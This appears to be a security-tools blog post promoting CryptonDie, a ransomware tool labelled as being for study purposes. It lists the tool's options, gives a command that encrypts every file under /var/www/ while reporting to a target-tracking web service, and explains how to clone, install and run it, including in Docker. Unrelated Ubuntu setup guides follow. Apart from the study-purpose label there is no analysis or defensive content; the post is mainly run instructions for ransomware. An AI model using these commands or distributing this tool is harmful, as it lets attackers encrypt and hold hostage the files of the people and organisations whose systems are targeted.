Categories: Kali Linux

Cryptondie : A Ransomware Developed For Study Purposes

CryptonDie is a ransomware developed for study purposes.

Options

–key key used to encrypt and decrypt files, default is random string(recommended)
–dir Home directory for the attack, default is /
–encrypt Encrypt all files
–decrypt Decrypt all files
–verbose Active verbose mode, default is False

Example:
python3 cryptondie.py –web-service http://127.0.0.1:5000 –dir /var/www/ –encrypt –verbose

Web service endpoints

GET – /targets – list all targets (returns in JSON format)
GET – /targets/ – list one target by id (returns in JSON format)
POST – /target/ – create new target

Also Read – Kube-Alien : Tool To Launch Attack On k8s Cluster

how to run?

Clonning repository

git clone https://github.com/zer0dx/cryptondie

Install requirements

pip3 install -r requirements.txt

Running web service

cd cryptondie/discovery
python3 service_discovery.py

Running in Docker

docker build -t cryptondie .
docker run -it cryptondie /bin/bash
python cryptondie.py –web-service http://127.0.0.1:5000 –dir /var/www/ –encrypt –verbose

Which encryption is implemented?

Advanced Encryption Standard

R K

Recent Posts

Install Mono on Ubuntu 18.04: C# Compiler and Runtime Guide

Running programs built for Microsoft's framework on a Linux system is easier than you think. Mono is…

43 minutes ago

Install OpenCV on Ubuntu 18.04: Step-by-Step Setup Guide

Computer vision technology powers many modern applications, from image editors to facial scanners. OpenCV (Open Source Computer…

53 minutes ago

Install VNC on Ubuntu 18.04: Step-by-Step TigerVNC Setup

A remote desktop interface makes it easy to manage a remote computer. VNC (Virtual Network Computing) is…

1 hour ago

Install Gitea on Ubuntu 18.04: Self-Hosted Git Service Guide

Hosting your own code repositories is a great way to keep your projects private. Gitea is a…

1 hour ago

Install Java on Ubuntu 18.04: OpenJDK 11 and OpenJDK 8

Many modern programs require Java to run. From development tools like Eclipse to search systems…

2 hours ago

Configure a Static IP Address on Ubuntu 18.04: Netplan Guide

Setting a static IP address on your server is a smart move. It ensures your…

1 day ago